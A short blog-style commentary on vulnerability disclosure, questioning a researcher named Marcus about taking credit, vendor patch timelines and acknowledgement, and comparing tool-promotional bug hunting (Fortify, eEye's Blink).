To be fair to Marcus, he just did the same thing himself. In fact, if I wanted to be extremely ungenerous, I could put him in the same category as the kid who just got a new fuzzer and went looking for problems. But he doesn't deserve that.

The difference for him, as he points out, is that he thinks there's no benefit to touting his findings, (presumably) not even after the patch is out. He reports that everyone was cool, and they are going to get the fix out Real Soon Now. So he can get the problem fixed without the fanfare.

I invite Marcus to finish the experiment, and give us an update later about the following:
  • Let us know if you will be taking credit for the finds.
  • Explain how pimping Fortify by searching for vulns in other people's software is different than eEye doing it to pimp Blink.
  • Tell us how long it takes the programmers to release the patch.
  • Tell us whether the programmers properly acknowledge that this update fixes a security problem, and that people should update right away.
  • Tell us if you spend the extra time to check that the patch correctly fixes the problem you identified.